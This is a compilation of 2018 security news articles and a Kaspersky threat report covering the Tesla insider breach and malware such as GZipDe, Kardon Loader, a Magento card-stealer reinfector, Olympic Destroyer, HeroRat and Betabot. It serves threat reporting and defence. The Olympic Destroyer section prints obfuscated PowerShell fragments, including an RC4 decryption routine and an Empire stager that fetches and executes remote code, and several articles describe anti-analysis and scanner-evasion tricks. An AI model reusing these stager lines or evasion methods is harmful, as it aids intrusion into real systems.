This was a mainstream malicious insider attack -- but there may be more to it than meets the eye. The motive, according to Musk, was revenge: "he wanted a promotion that he did not receive." But this incident goes way beyond simple revenge sabotage, and includes the theft of sensitive data and the export of that data to unknown outside parties.

The incident could have been triggered by revenge and aggravated by bribery; but until and unless those outside parties can be identified for certain, the true cause of the attack will remain speculative.

Musk himself is willing to speculate with insinuation. "As you know," he told employees, "there are a long list of organizations that want Tesla to die. These include Wall Street short-sellers, who have already lost billions of dollars and stand to lose a lot more." He then added oil and gas companies, who "rumor has it... are sometimes not super nice;" and the "big gas/diesel car company competitors [who already cheat on pollution levels, and] maybe they're willing to cheat in other ways?" The only potential risks he excluded were nation-states wishing to give their own nascent industries a technology boost, cyber criminals wishing to ransom Tesla or sell to competitors, and -- dare we say it -- whistleblowing.

Such is the nature of attribution for cybercrimes, it may never be known who -- if anyone outside of the malicious insider himself -- is really behind the incident. Sometimes it is only national intelligence agencies who know who did what on the internet through their much wider access to signals intelligence -- but those same agencies can equally feel that it is not in the national interest to get involved. If it was a foreign nation dabbling in IP theft, the intelligence agencies might go public. If it was a competitor or major national industry, the agencies might take the view that their role is not law enforcement.

In reality, the destination of the stolen data may already be known.

The attack itself seems to be typical insider work, using false usernames. We don't know whether those false usernames were existing accounts, or new accounts created by the attacker. In either case, however, it seems certain that the attacker enjoyed higher system privileges than was necessary.

“This," comments Joseph Carson, chief security scientist at Thycotic, "is a major reminder why privileged access management (PAM) is a must-have for organizations that deal with sensitive information or personal information -- and why least-privilege is a practice being adopted by many organizations."

It's a problem made more difficult, he suggests, because companies try to protect the privileged accounts they know about, which in most cases isn't effective. "Organizations continue to fail at the most important aspect of restricting privileged access, which is proactively discovering privileged accounts in the environment. It appears that Tesla have failed to do that most important step in least-privilege, which is discovering and detecting unapproved privileged access."

Since Musk's original disclosure of the breach by internal email on Sunday, matters have moved forward rapidly. On Wednesday, Tesla filed a complaint against the employee -- named as Martin Tripp -- in the Nevada District Court. This complaint admits that "Tesla has only begun to understand the full scope of Tripp’s illegal activity, but he has thus far admitted to writing software that hacked Tesla’s manufacturing operating system (“MOS”) and to transferring several gigabytes of Tesla data to outside entities."

Within a few months of Tripp joining Tesla, says the complaint, "his managers identified Tripp as having problems with job performance and at times being disruptive and combative with his colleagues. As a result of these and other issues, on or about May 17, 18, Tripp was assigned to a new role. Tripp expressed anger that he was reassigned. Thereafter, Tripp retaliated against Tesla by stealing confidential and trade secret information and disclosing it to third parties, and by making false statements intended to harm the company."

But according to a report published today by the BBC, Tripp "says he’s a whistleblower being smeared for speaking out about standards and safety at the company, and deserves protection." The implication is that Tripp provided the documents used by Business Insider in its June 4 report; 'Internal documents reveal Tesla is blowing through an insane amount of raw material and cash to make Model 3s, and production is still a nightmare'.

The BBC also publishes extracts from a rapid-fire email exchange between Musk and Tripp that took place on Wednesday. At one point, Musk writes, "You should ashamed of yourself for framing other people. You're a horrible human being." This is likely a reference to Tripp's hacking software being found on three other employees' computers. The legal complaint alleges, "His hacking software was operating on three separate computer systems of other individuals at Tesla so that the data would be exported even after he left the company and so that those individuals would be falsely implicated as guilty parties."

Tripp responded, "I NEVER 'framed' anyone else or even insinuated anyone else as being involved in my production of documents of your MILLIONS OF DOLLARS OF WASTE, Safety concerns, lying to investors/the WORLD. Putting cars on the road with safety issues is being a horrible human being!"

Whistleblowing is one optional reason for the data theft not mentioned by Musk in his June 17 email to staff, even though the Business Insider allegation mentions 'internal documents' and was published two weeks earlier. The full truth of what happened in this incident is likely to be exposed in court rather than via computer forensics.

However, in information security terms, an insider stole sensitive documents from Tesla. The motive is not as important as the act. It seems that Tesla does not operate adequate least-privilege measures, and does not have an internal traffic monitoring system capable of detecting and blocking the unsanctioned exfiltration of gigabytes of data. This failure has left Tesla with a PR nightmare that it must now manage.

New Encrypted Downloader Delivers Metasploit Backdoor
23.6.18 securityweek 

A series of cyber-attacks targeting the Middle Eastern region use an encrypted downloader to deliver a Metasploit backdoor, AlienVault reports.

The attacks start with a malicious document containing parts of an article about the next Shanghai Cooperation Organization Summit, originally published at the end of May on a Middle Eastern news network.

The Office document contains malicious macro code designed to execute a Visual Basic script (stored as a hexadecimal stream) and launch a new task in a hidden Powershell console. This attack stage is meant to serve a .NET downloader that uses a custom encryption method to obfuscate process memory and evade antivirus detection.

Dubbed GZipDe, the downloader appears based on a publicly available reverse-tcp payload to which the malware author added a new layer of encryption payload.

“It consists of a Base64 string, named GZipDe, which is zip-compressed and custom-encrypted with a symmetric key algorithm, likely to avoid antivirus detection,” AlienVault reveals.

A new memory page with execute, read and write privileges is created, then a decrypted payload is executed. Courtesy of a special handler that controls process’ access to system resources, only one instance of the malware can run at the same time.

Shellcode in the downloader connects to a server at 175.194.42[.]8 to deliver the final payload. The server wasn’t up during analysis, but it was previously recorded serving a Metasploit payload, the security researchers note.

Metasploit has become a popular choice among threat actors, and was previously seen being used in targeted attacks associated with the Turla hackers.

The Metasploit payload delivered from 175.194.42[.]8, AlienVault says, contains a shellcode to bypass system detection, as well as a Meterpreter payload. This malicious program is a powerful backdoor capable of gathering information from the system. The malware also stays in contact with the command and control server to receive further commands.

The shellcode, the researchers explain, loads the entire DLL into memory, meaning that it works without writing information to the disk.

Called reflective DLL injection, this technique allows the attacker to “transmit any other payload in order to acquire elevated privileges and move within the local network,” AlienVault concludes.

GZipDe Downloader spotted serving a Metasploit backdoor
22.6.18 securityaffairs

Security experts from AlienVault have spotted a new piece of malware named GZipDe that was used in a cyber-espionage campaign.
GZipDe is downloader that is used by threat actors to fetch other payloads from a server controlled by attackers.

The malware was detected after user from Afghanistan has uploaded a weaponized Word document on VirusTotal service, the document refers to the Shanghai Cooperation Organization Summit.

At the time it is not possible to attribute the malicious code to a specific actor, VirusTotal doesn’t share information about the source of the upload and the target of the attack was not disclosed, the researchers were only able to analyze the sample.

“It seems very targeted,” Chris Doman, a security researcher with AlienVault told Bleeping Computer. “Given the decoy document is in English and uploaded from Afghanistan, it may have been targeting someone in an embassy or similar there.”

The malicious code was a multi-stage malware, the attack chain starts with a spear-phishing message spreading the weaponized Word document, the final goal appears to be the delivery of a Metasploit backdoor.

“This is the first step of a multistage infection in which several servers and artifacts are involved. Although the final goal seems to be the installation of a Metasploit backdoor, we found an interesting .NET downloader which uses a custom encryption method to obfuscate process memory and evade antivirus detection.” reads the report published by Alien Vault.

The document was designed to trick victims into enabling macros, which then executes a Visual Basic script stored as a hexadecimal stream, and executes a new task in a hidden Powershell console which downloads a PE32 executable. The ultimate step consists of the delivery of the GZipDe malware.


The GZipDe downloader was written in .NET, and implements a custom encryption method to obfuscate process memory and evade antivirus detection.

While investigating the GZipDe downloader the experts noticed that the server used to store the payloads that were fetched by the malware was down.

Further investigation allowed AlienVault to find information about the server on the Shodan search engine that had indexed it and recorded it serving a Metasploit backdoor.

“The payload contains shellcode that contacts the server at 175.194.42[.]8. Whilst the server isn’t up, Shodan recorded it serving a Metasploit payload:”

“The server, 175.194.42[.]8, delivers a Metasploit payload. It contains shellcode to bypass system detection (since it looks to have a valid DOS header) and a Meterpreter payload – a capable backdoor. For example, it can gather information from the system and contact the command and control server to receive further commands.”

The shellcode loads the entire DLL into memory, it is a fileless malware that could allow attackers to transmit any other payload in order to acquire elevated privileges and perform lateral movements within the local network.

The choice of Metasploit is not a novelty, APT groups like Cobalt Strike and CopyKittens adopted it in their campaigns to make hard the attribution of their attacks.

Technical details including IoCs are reported in the analysis published by AlienVault.

Magento credit card stealer Reinfector allows reinfect sites with malicious code
22.6.18 securityaffairs

Cybercriminals used the ‘credit card stealer reinfector’ to reinfect the websites and continue to steal personal and financial data.
Researchers at Sucuri reported crooks are using a very simple evasion technique to reinfect Magento websites after their malicious code has been removed.

Cybercriminals have devised a method to hide the malicious code, the ‘credit card stealer reinfector’, used to reinfect the websites and continue to steal personal and financial data.

The credit card stealer reinfector is hidden inside the default configuration file (config.php) of Magento installs, it is included on the main index.php and is loaded with every page visited by the users, this process ensures that the code is re-injected into multiple files of the website.

Researchers highlighted that the config.php file is automatically configured during the installation of the Magento instance and usually administrators or website owners don’t change it.

“This code is a prime candidate for infections once it is included right on the main index.php, loading at every page.” reads the analysis published by the experts.

“On the first block, we have a function called “patch” that writes content into a file (patching it). This function is then called to write externally obtained content into specific files related to the payment process or user control:

The malicious code also obfuscates external links in a way that a simple variable replacement and base64 decoding can read it”

The malicious code was stored on Pastebin, this choice allows attackers to remain under the radars.

Experts pointed out that the reinfector code they analyzed is able to bypass security scanners.

“The mechanism the attackers add “error_reporting(0);”is very interesting. It avoids any error leading to the discovery of the infection.” states the post.

The patch() function is used to inject the malicious code for stealing confidential information into Magento files, it uses 4 arguments (The path of a folder, the name of a file stored in that path needs to be infected, file size that is used to check if it is necessary to reinfect the given file, a new file name to be created, and the remote URL from which the malicious code will be downloaded.

Experts noticed that the base64_decode() function is split in multiple parts to evade detection from security scanners.

“As a rule of thumb, on every Magento installation where a compromise is suspected to have taken place, the /includes/config.php should be verified quickly. We advise you to do it first thing. Many times, removing just the infection that you have a main concern about is not enough. You should always assume someone is out there ready to catch you off guard.” conclude the researchers.

Kardon Loader Allows Anyone to Build a Distribution Network
21.6.18 securityweek 

The author of a newly discovered malware downloader allows interested parties to set up a botshop and build a malware distribution network, Netscout Arbor reveals.

Dubbed Kardon Loader, the downloader started being advertised on underground forums as a paid beta product on April 21, 18. The actor behind it, using the online handler Yattaze, asks $50 for the malicious program and offers it as a standalone build, with charges for each additional rebuild. He/she also allows customers to set up a botshop and sell access to their own operation.

Downloader malware and botshops are typically used by malware authors and distributors to build networks and create botnets that are then leveraged for the distribution of information stealers, ransomware, banking Trojans, and other threats. These networks are often offered as a service on underground markets.

The newly observed Kardon Loader appears to be a rebrand of the ZeroCool botnet, which was developed by the same actor (who had an account on the forum since April 2017 and received multiple vouches for this product).

The actor, Netscout Arbor reveals, is using a professional looking advertisement for the loader, with its own logo, and provides a disclaimer claiming that the software should not be used maliciously. The developer also published a YouTube video detailing the downloader’s admin panel functionality.

Kardon Loader, the actor claims, has bot functionality, can download/execute/update/uninstall tasks, has debug and analysis protection, supports TOR and Domain Generation Algorithm (DGA), includes usermode rootkit functionality, and RC4 encryption (not yet implemented).

“ASERT found many of these features absent in the samples reviewed. All samples analyzed used hard-coded command and control (C&C) URLs instead of DGA. There was also no evidence of TOR or user mode rootkit functionality in the binaries,” the security firm reveals.

For anti-analysis, the malware downloader attempts to get the module handle for a variety of DLLs associated with antivirus, analysis, and virtualization tools, and exits its process if any of the targeted handles are returned.

Kardon Loader can also enumerate the CPUID Vendor ID value and compare it against values associated with virtual machines (such as Microsoft HV, VMware, and VBox). Should any of them be detected, the malware also exits.

The threat uses a HTTP-based C&C infrastructure and base64 encoded URL parameters. When executed, the malware sends HTTP POSTs to the C&C server, with information such as an identification number, operating system, user privilege, initial payload, computer name, user name, and processor architecture.

Depending on the server response, the malware can download and execute additional payloads, visit a website, upgrade current payloads, or uninstall itself.

The administration panel has a simple design, with a dashboard where bot distribution and install statistics are displayed. A “bot store” feature allows the bot admin to generate access keys for customers, providing them with the ability to execute tasks based on the predefined parameters.

“Kardon Loader is a fully featured downloader, enabling the download and installation of other malware, eg. banking Trojans/credential theft etc. […] Although only in public beta stage this malware features bot store functionality allowing purchasers to open up their own botshop with this platform,” Netscout Arbor concludes.

Building a malware distribution network is too easy with Kardon Loader
21.6.18 securityaffairs 

Researchers at Netscout Arbor have discovered a malware downloader advertised on underground forums as a paid open beta product, its name is Kardon Loader.
Researchers from Netscout Arbor have discovered a downloader advertised on underground forums dubbed Kardon Loader, it allows customers to build a malware distribution network or a botshop.

Advs for Kardon Loader were first discovered on April 21, 18, the author who goes online with the moniker Yattaze asks $50 for the application program and offers it as a standalone build, charging users for each additional rebuild.

“Kardon Loader is a malware downloader advertised on underground forums as a paid open beta product.” reads a blog post published by Netscout Arbor.

“The actor offers the sale of the malware as a standalone build with charges for each additional rebuild, or the ability to set up a botshop in which case any customer can establish their own operation and further sell access to a new customer base.”

Downloader malware and botshops are essential components for the creation of botnets that could be used to distribute a broad range of malware such as ransomware, banking Trojans, and cryptocurrency miners.

Crooks use to offer the access to distribution networks as a service in cybercrime underground markets.

Experts believe the Kardon Loader represents a rebrand of the ZeroCool botnet that was built by the same actor.

The advertisement for the Kardon Loader appears very professional, the actor created its own logo and provides a disclaimer claiming that the software should not be used for malicious purposes. He also published a YouTube video that shows the admin panel of the platform.

Below the bot functionalities advertised by the actor:

Bot Functionality
Download and Execute Task
Update Task
Uninstall Task
Usermode Rootkit
RC4 Encryption (Not Yet Implemented)
Debug and Analysis Protection
TOR Support
Domain Generation Algorithm (DGA)
Researchers from ASERT analyzed some samples of the malicious code and noticed that some features were not implemented, for example, all samples were using hard-coded command and control (C&C) URLs instead of DGA, both the “usermode rootkit” and Tor support were not implemented.

The experts determine that the malware downloader checks for the handle for a variety of DLLs associated with antivirus, analysis, and virtualization tools, and halts its process if any of the handles are returned.

To avoid the execution in a virtualized environment, the Kardon Loader also enumerate the CPUID Vendor ID value and compare it against the following strings:

Microsoft Hv
prl hyperv
These are known CPUID Vendor ID values associated with virtualized machines. If one of these values are detected the malware will also exit

Kardon Loader can also enumerate the CPUID Vendor ID value and compare it against a list of known values associated with virtual machines (KVMKVMKVM, Microsoft Hv, VMwareVMware, XenVMMXenVMM, prl hyperv, VBoxVBoxVBox).

The malicious code uses a HTTP-based C&C infrastructure with URL parameters that are base64 encoded.

“Upon execution Kardon Loader will send HTTP POSTs to the C2 with the following fields:

ID = Identification Number
OS = Operating System
PV = User Privilege
IP = Initial Payload (Full Path)
CN = Computer Name
UN = User Name
CA = Processor Architecture”
In turn, the server provides instructions to the malware, such as download and execute additional payloads, visit a website, upgrade current payloads, or uninstall itself.

The administration panel is very simple, it implements a dashboard that provides information about the bot distribution and statistics about the installations.

kardon loader panel1-1024x512

“A notable feature of this panel is the bot store functionality allowing the bot admin to generate access keys to customers that would give them the ability to execute tasks based on the predefined parameters” continues the analysis,

“Although only in public beta stage this malware features bot store functionality allowing purchasers to open up their own botshop with this platform,”

The analysis includes the IoCs that could be used by organizations to block malicious activity associated with Kardon Loader.

Olympic Destroyer is still alive
20.6.18 Kasperksy

In March 18 we published our research on Olympic Destroyer, an advanced threat actor that hit organizers, suppliers and partners of the Winter Olympic Games 18 held in Pyeongchang, South Korea. Olympic Destroyer was a cyber-sabotage attack based on the spread of a destructive network worm. The sabotage stage was preceded by reconnaissance and infiltration into target networks to select the best launchpad for the self-replicating and self-modifying destructive malware.

We have previously emphasized that the story of Olympic Destroyer is different to that of other threat actors because the whole attack was a masterful operation in deception. Despite that, the attackers made serious mistakes, which helped us to spot and prove the forgery of rare attribution artefacts. The attackers behind Olympic Destroyer forged automatically generated signatures, known as Rich Header, to make it look like the malware was produced by Lazarus APT, an actor widely believed to be associated with North Korea. If this is new to the reader, we recommend a separate blog dedicated to the analysis of this forgery.

The deceptive behavior of Olympic Destroyer, and its excessive use of various false flags, which tricked many researchers in the infosecurity industry, got our attention. Based on malware similarity, the Olympic Destroyer malware was linked by other researchers to three Chinese speaking APT actors and the allegedly North Korean Lazarus APT; some code had hints of the EternalRomance exploit, while other code was similar to the Netya (Expetr/NotPetya) and BadRabbit targeted ransomware. Kaspersky Lab managed to find lateral movement tools and initial infection backdoors, and has followed the infrastructure used to control Olympic Destroyer in one of its South Korean victims.

Some of the TTPs and operational security used by Olympic Destroyer bear a certain resemblance to Sofacy APT group activity. When it comes to false flags, mimicking TTPs is much harder than tampering with technical artefacts. It implies a deep knowledge of how the actor being mimicked operates as well as operational adaptation to these new TTPs. However, it is important to remember that Olympic Destroyer can be considered a master in the use of false flags: for now we assess that connection with low to moderate confidence.
We decided to keep tracking the group and set our virtual ‘nets’ to catch Olympic Destroyer again if it showed up with a similar arsenal. To our surprise it has recently resurfaced with new activity.

In May-June 18 we discovered new spear-phishing documents that closely resembled weaponized documents used by Olympic Destroyer in the past. This and other TTPs led us to believe that we were looking at the same actor again. However, this time the attacker has new targets. According to our telemetry and the characteristics of the analyzed spear-phishing documents, we believe the attackers behind Olympic Destroyer are now targeting financial organizations in Russia, and biological and chemical threat prevention laboratories in Europe and Ukraine. They continue to use a non-binary executable infection vector and obfuscated scripts to evade detection.

Simplified infection procedure

Infection Analysis
In reality the infection procedure is a bit more complex and relies on multiple different technologies, mixing VBA code, Powershell, MS HTA, with JScript inside and more Powershell. Let’s take a look at this more closely to let incident responders and security researchers recognize such an attack at any time in the future.

One of the recent documents that we discovered had the following properties:

MD5: 0e7b32d23fbd6d62a593c234bafa2311
SHA1: ff59cb2b4a198d1e6438e020bb11602bd7d2510d
File Type: Microsoft Office Word
Last saved date: 18-05-14 15:32:17 (GMT)
Known file name: Spiez CONVERGENCE.doc

The embedded macro is heavily obfuscated. It has a randomly-generated variable and function name.

Obfuscated VBA macro

Its purpose is to execute a Powershell command. This VBA code was obfuscated with the same technique used in the original Olympic Destroyer spear-phishing campaign.

It starts a new obfuscated Powershell scriptlet via the command line. The obfuscator is using array-based rearranging to mutate original code, and protects all commands and strings such as the command and control (C2) server address.

There is one known obfuscation tool used to produce such an effect: Invoke-Obfuscation.

Obfuscated commandline Powershell scriptlet

This script disables Powershell script logging to avoid leaving traces:

It has an inline implementation of the RC4 routine in Powershell, which is used to decrypt additional payload downloaded from Microsoft OneDrive. The decryption relies on a hardcoded 32-byte ASCII hexadecimal alphabet key. This is a familiar technique used in other Olympic Destroyer spear-phishing documents in the past and in Powershell backdoors found in the infrastructure of Olympic Destroyer’s victims located in Pyeongchang.

${k}= ( .VARiabLE Bqvm ).vAlUE::”aSCiI”.GETBYtes.Invoke(d209233c7d7d7acee5aa0e8b0889bb1e);
-JoIn[CHar[]](^& ${r} ${daTa} (${iV}+${k}))
${k}= ( .VARiabLE Bqvm ).vAlUE::“aSCiI”.GETBYtes.Invoke(d209233c7d7d7acee5aa0e8b0889bb1e);
–JoIn[CHar[]](^& ${r} ${daTa} (${iV}+${k}))
The second stage payload downloaded is an HTA file that also executes a Powershell script.

Downloaded access.log.txt

This file has a similar structure to the Powershell script executed by the macro in spear-phishing attachments. After deobfuscating it, we can see that this script also disables Powershell logging and downloads the next stage payload from the same server address. It also uses RC4 with a pre-defined key:

${k}= ( Get-vaRiablE R4Imz -VAl )::”aSCIi”.GEtBytEs.Invoke(d209233c7d7d7acee5aa0e8b0889bb1e);
-JoiN[ChAR[]](^& ${R} ${daTa} (${IV}+${k}))
${k}= ( Get–vaRiablE R4Imz –VAl )::“aSCIi”.GEtBytEs.Invoke(d209233c7d7d7acee5aa0e8b0889bb1e);
–JoiN[ChAR[]](^& ${R} ${daTa} (${IV}+${k}))
The final payload is the Powershell Empire agent. Below we partially provide the http stager scriptlet for the downloaded Empire agent.

$raw = $wc.UploadData($s + “/modules/admin.php”,”POST”,$rc4p2);
Invoke-Expression $($e.GetSTRiNG($(DecrYPT-BYtEs -KeY $kEy -In $raW)));
$AES = $NuLl;

Invoke-Empire -Servers @(($s -split “/”)[0..2] -join “/”) -StagingKey $SK -SessionKey $key -SessionID $ID -WorkingHours “WORKING_HOURS_REPLACE” -KillDate “REPLACE_KILLDATE” -ProxySettings $Script:Proxy; }
$raw = $wc.UploadData($s + “/modules/admin.php”,“POST”,$rc4p2);
Invoke–Expression $($e.GetSTRiNG($(DecrYPT–BYtEs –KeY $kEy –In $raW)));
$AES = $NuLl;

Invoke–Empire –Servers @(($s –split “/”)[0..2] –join “/”) –StagingKey $SK –SessionKey $key –SessionID $ID –WorkingHours “WORKING_HOURS_REPLACE” –KillDate “REPLACE_KILLDATE” –ProxySettings $Script:Proxy; }
Powershell Empire is a post-exploitation free and open-source framework written in Python and Powershell that allows fileless control of the compromised hosts, has modular architecture and relies on encrypted communication. This framework is widely used by penetration-testing companies in legitimate security tests for lateral movement and information gathering.

We believe that the attackers used compromised legitimate web servers for hosting and controlling malware. Based on our analysis, the URI path of discovered C2 servers included the following paths:

These are known directory structures used by a popular open source content management system, Joomla:

Joomla components path on Github

Unfortunately we don’t know what exact vulnerability was exploited in the Joomla CMS. What is known is that one of the payload hosting servers used Joomla v1.7.3, which is an extremely old version of this software, released in November 2011.

A compromised server using Joomla

Victims and Targets
Based on several target profiles and limited victim reports, we believe that the recent operation by Olympic Destroyer targets Russia, Ukraine and several other European countries. According to our telemetry, several victims are entities from the financial sector in Russia. In addition, almost all the samples we found were uploaded to a multi-scanner service from European countries such as the Netherlands, Germany and France, as well as from Ukraine and Russia.

Location of targets in recent Olympic Destroyer attacks

Since our visibility is limited, we can only speculate about the potential targets based on the profiles suggested by the content of selected decoy documents, email subjects or even file names picked by the attackers.

One such decoy document grabbed our attention. It referred to ‘Spiez Convergence’, a bio-chemical threat research conference held in Switzerland, organized by SPIEZ LABORATORY, which not long ago was involved in the Salisbury attack investigation.

Decoy document using Spiez Convergence topic

Another decoy document observed in the attacks (‘Investigation_file.doc’) references the nerve agent used to poison Sergey Skripal and his daughter in Salisbury:

Some other spear-phishing documents include words in the Russian and German language in their names:

9bc365a16c63f25dfddcbe11da042974 Korporativ.doc
da93e6651c5ba3e3e96f4ae2dd763d94 Korporativ_18.doc
e2e102291d259f054625cc85318b7ef5 E-Mail-Adressliste_18.doc
One of the documents included a lure image with perfect Russian language in it.

A message in Russian encouraging the user to enable macro (54b06b05b6b92a8f2ff02fdf47baad0e)

One of the most recent weaponized documents was uploaded to a malware scanning service from Ukraine in a file named ‘nakaz.zip’, containing ‘nakaz.doc’ (translated as ‘order.doc’ from Ukrainian).

Another lure message to encourage the user to enable macro

According to metadata, the document was edited on June 14th. The Cyrillic messages inside this and previous documents are in perfect Russian, suggesting that it was probably prepared with the help of a native speaker and not automated translation software.

Once the user enables macro, a decoy document is displayed, taken very recently from a Ukrainian state organization (the date inside indicates 11 June 18). The text of the document is identical to the one on the official website of the Ukrainian Ministry of Health.

Decoy document inside nakaz.doc

Further analysis of other related files suggest that the target of this document is working in the biological and epizootic threat prevention field.

Although not comprehensive, the following findings can serve as a hint to those looking for a better connection between this campaign and previous Olympic Destroyer activity. More information on overlaps and reliable tracking of Olympic Destroyer attacks is available to subscribers of Kaspersky Intelligence Reporting Services (see below).

Similar obfuscated macro structure

The documents above show apparent structural similarity as if they were produced by the same tool and obfuscator. The highlighted function name in the new wave of attacks isn’t in fact new. While being uncommon, a function named “MultiPage1_Layout” was also found in the Olympic Destroyer spear phishing document (MD5: 5ba7ec869c7157efc1e52f5157705867).

Same MultiPage1_Layout function name used in older campaign

Despite initial expectations for it to stay low or even disappear, Olympic Destroyer has resurfaced with new attacks in Europe, Russia and Ukraine. In late 2017, a similar reconnaissance stage preceded a larger cyber-sabotage stage meant to destroy and paralyze infrastructure of the Winter Olympic Games as well as related supply chains, partners and even venues at the event location. It’s possible that in this case we have observed a reconnaissance stage that will be followed by a wave of destructive attacks with new motives. That is why it is important for all bio-chemical threat prevention and research companies and organizations in Europe to strengthen their security and run unscheduled security audits.

The variety of financial and non-financial targets could indicate that the same malware was used by several groups with different interests – i.e. a group primarily interested in financial gain through cybertheft and another group or groups looking for espionage targets. This could also be a result of cyberattack outsourcing, which is not uncommon among nation state actors. On the other hand, the financial targets might be another false flag operation by an actor who has already excelled at this during the Pyeongchang Olympics to redirect researchers’ attention.

Certain conclusions could be made based on motives and the selection of targets in this campaign. However, it is easy to make a mistake when trying to answer the question of who is behind this campaign with only the fragments of the picture that are visible to researchers. The appearance, at the start of this year, of Olympic Destroyer with its sophisticated deception efforts, changed the attribution game forever. We believe that it is no longer possible to draw conclusions based on few attribution vectors discovered during regular investigation. The resistance to and deterrence of threats such as Olympic Destroyer should be based on cooperation between the private sector and governments across national borders. Unfortunately, the current geopolitical situation in the world only boosts the global segmentation of the internet and introduces many obstacles for researchers and investigators. This will encourage APT attackers to continue marching into the protected networks of foreign governments and commercial companies.

The best thing we can do as researchers is to keep tracking threats like this. We will keep monitoring Olympic Destroyer and report on new discovered activities of this group.

More details about Olympic Destroyer and related activity are available to subscribers of Kaspersky Intelligence Reporting services. Contact: intelreports@kaspersky.com

Indicators Of Compromise
File Hashes
9bc365a16c63f25dfddcbe11da042974 Korporativ .doc
da93e6651c5ba3e3e96f4ae2dd763d94 Korporativ_18.doc
6ccd8133f250d4babefbd66b898739b9 corporativ_18.doc
abe771f280cdea6e7eaf19a26b1a9488 Scan-18-03-13.doc.bin
b60da65b8d3627a89481efb23d59713a Corporativ_18.doc
bb5e8733a940fedfb1ef6b0e0ec3635c recommandation.doc
97ddc336d7d92b7db17d098ec2ee6092 recommandation.doc
1d0cf431e623b21aeae8f2b8414d2a73 Investigation_file.doc
0e7b32d23fbd6d62a593c234bafa2311 Spiez CONVERGENCE.doc
e2e102291d259f054625cc85318b7ef5 E-Mail-Adressliste_18.doc
4247901eca6d87f5f3af7df8249ea825 nakaz.doc

Domains and IPs

'Olympic Destroyer' Malware Spotted in New Attacks
19.6.18 securityweek

Olympic Destroyer, the malware involved in a campaign targeting this year’s Olympic Winter Games in Pyeongchang, South Korea, has been used recently in attacks aimed at organizations in Germany, France, the Netherlands, Russia, Switzerland and Ukraine.

Olympic Destroyer is designed to wipe files and make systems inoperable, and steal passwords from browsers and Windows. The malware was used during the Olympics in an attack that disrupted IT systems, including the official event website, display monitors, and Wi-Fi connections.

Researchers noted after the attack that the hackers behind the operation planted sophisticated false flags inside Olympic Destroyer. Various clues suggested that the campaign could have been the work of North Korea, Russia or China.

Kaspersky Lab spotted new attacks involving Olympic Destroyer in May and June, and the list of targets raises even more questions about the threat actor’s goals and motives.

The latest attacks targeted financial companies in Russia and European organizations focusing on protection against chemical and biological threats, including in Germany, France, the Netherlands, Switzerland and Ukraine.

The malware was delivered using spear-phishing emails carrying malicious documents. Many of the decoy documents referenced bio-chemical threat research, and some of the text was written in perfect Russian, which suggests that a native speaker helped write it.

The attack also involved PowerShell scripts and Powershell Empire, an open-source framework that allows fileless control of the compromised machine. The malware was hosted and controlled using hacked web servers running vulnerable versions of the Joomla content management system.

The fact that financial organizations were also targeted could mean one of several things. It’s possible that the Olympic Destroyer malware is used by multiple threat groups, including one that is financially motivated. It could also be a result of cyberattack outsourcing, which researchers claim is not uncommon for nation state actors, or the financial-focused attacks could be part of another false flag operation. In any case, the new attacks involving Olympic Destroyer are significant.

“It’s possible that in this case we have observed a reconnaissance stage that will be followed by a wave of destructive attacks with new motives. That is why it is important for all bio-chemical threat prevention and research companies and organizations in Europe to strengthen their security and run unscheduled security audits,” Kaspersky researchers warned.

HeroRat Controls Infected Android Devices via Telegram
19.6.18 securityweek Android 

A newly detailed Android remote access Trojan (RAT) is leveraging Telegram’s bot functionality to control infected devices, ESET reveals.

Dubbed HeroRat, the malware has been spreading since at least August 2017. As of March 18, the Trojan’s source code has been available for free on Telegram hacking channels, resulting in hundreds of variants emerging in attacks.

Although the source code is available for free, one of these variants is being sold on a dedicated Telegram channel at three price points, depending on functionality. A support video channel is also available, the security company has discovered.

“It is unclear whether this variant was created from the leaked source code, or if it is the ‘original’ whose source code was leaked,” ESET’s Lukas Stefanko notes in a blog post.

HeroRat differs from other Telegram-abusing Android RATs in that it has been developed from scratch in C#, using the Xamarin framework, Stefanko says. This is a rare combination for Android malware, as previously analyzed Trojans were written in standard Android Java.

Moreover, the malware author has adapted the Telegram protocol to the used programming language. Instead of using the Telegram Bot API as other RATs, the new threat uses Telesharp, a library for creating Telegram bots with C#. All communication to and from the infected devices is performed using the Telegram protocol.

The new malware is being distributed via third-party app stores, social media, and messaging apps, in various appealing guises (apps promising free Bitcoins, free Internet, and more followers on social media), mostly in Iran.

The malicious program is compatible with all Android versions, but it requires users to grant it a broad range of permissions, sometimes even activating its app as device administrator. Based on these permissions, the threat can then erase all data on the device, lock the screen, change passwords, and change password rules.

After the installation has been completed and the malware is launched, a popup appears (in either English or Persian), claiming that the app can’t run and that it is being uninstalled. The victim is then informed the uninstallation has been completed, and the app icon disappears.

The malware, however, continues to run in the background, and the attacker can start using Telegram’s bot functionality to control the newly infected device. A bot operated via the Telegram app controls each compromised device, Stefanko says.

HeroRat can spy on victims and exfiltrate files from the infected devices. It can intercept text messages, steal contacts, send text messages, and make calls, record audio and screen, obtain device location, and control the device’s settings.

These capabilities are accessible through clickable buttons in the Telegram bot interface, making it very easy for attackers to control victimized devices.

The malware author has put for sale bronze, silver, and gold panels, offered at $25, $50, and $100, respectively. The malware’s source code, on the other hand, is available at $650, offered by HeroRat’s (ambitious) author themselves.

“With the malware’s source code recently made available for free, new mutations could be developed and deployed anywhere in the world,” Stefanko notes.

“To avoid falling victim to Android malware, stick to the official Google Play store when downloading apps, make sure to read user reviews before downloading anything to your device and pay attention to what permissions you grant to apps both before and after installation,” the researcher concludes.

Multi-Layered Infection Attack Installs Betabot Malware
19.6.18 securityweek 

The Betabot Trojan is being spread in a multi-stage attack that starts with malicious Office documents attempting to exploit a 17-year old vulnerability.

Betabot is a piece of malware that evolved from being a banking Trojan to a password stealer, and then a botnet capable of distributing ransomware and other malicious programs. Although readily available for purchase on underground markets at around $120, a cracked version of the malware was also observed in early 2017.

The recently spotted attacks start with a Word document attempting to exploit CVE-2017–11882, a vulnerability introduced in November 2000 in the Microsoft Equation Editor (EQNEDT32.EXE) component. Discovered only last year, the security bug was manually patched by Microsoft in late 2017.

As part of this attack, the actor embedded an OLE object into a specially crafted RTF file to execute commands on the victim system. The embedded objects (inteldriverupd1.sct, task.bat, decoy.doc, exe.exe, and 2nd.bat) pose as legitimate software to gain the intended victim’s trust.

The inteldriverupd1.sct file leverages Windows Script Component and creates a new object, which next runs the task.bat script to check for a block.txt file in the temp directory, create the file if it doesn’t exist, and start 2nd.bat before deleting itself.

